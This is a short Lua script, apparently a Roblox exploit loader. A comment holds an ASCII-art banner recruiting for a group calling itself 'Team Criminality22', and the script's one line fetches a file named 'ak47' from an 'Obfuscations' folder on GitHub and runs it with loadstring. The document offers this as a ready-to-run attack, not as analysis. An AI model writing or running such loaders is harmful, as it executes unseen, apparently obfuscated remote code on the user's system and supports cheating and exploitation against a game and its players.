--[[

 _____ _____  ___  ___  ___  _____ ______ ________  ________ _   _   ___   _     _____ _______   _______  _____     ___  _____ _____ _   _   _____ ___________  _____   ___ _ 
|_   _|  ___|/ _ \ |  \/  | /  __ \| ___ \_   _|  \/  |_   _| \ | | / _ \ | |   |_   _|_   _\ \ / / __  \/ __  \   |_  ||  _  |_   _| \ | | |_   _|  _  |  _  \/ _ \ \ / / | |
  | | | |__ / /_\ \| .  . | | /  \/| |_/ / | | | .  . | | | |  \| |/ /_\ \| |     | |   | |  \ V /`' / /'`' / /'     | || | | | | | |  \| |   | | | | | | | | / /_\ \ V /| | |
  | | |  __||  _  || |\/| | | |    |    /  | | | |\/| | | | | . ` ||  _  || |     | |   | |   \ /   / /    / /       | || | | | | | | . ` |   | | | | | | | | |  _  |\ / | | |
  | | | |___| | | || |  | | | \__/\| |\ \ _| |_| |  | |_| |_| |\  || | | || |_____| |_  | |   | | ./ /___./ /___ /\__/ /\ \_/ /_| |_| |\  |   | | \ \_/ / |/ /| | | || | |_|_|
  \_/ \____/\_| |_/\_|  |_/  \____/\_| \_|\___/\_|  |_/\___/\_| \_/\_| |_/\_____/\___/  \_/   \_/ \_____/\_____/ \____/  \___/ \___/\_| \_/   \_/  \___/|___/ \_| |_/\_/ (_|_)
                                                                                                                                                                              
                                                                                                                                                                              




]]



loadstring(game:HttpGet("https://raw.githubusercontent.com/AnthonyJRoberto/TEAMCRIMINALITY22_SSCRIPTS--/refs/heads/main/Obfuscations/ak47",true))()
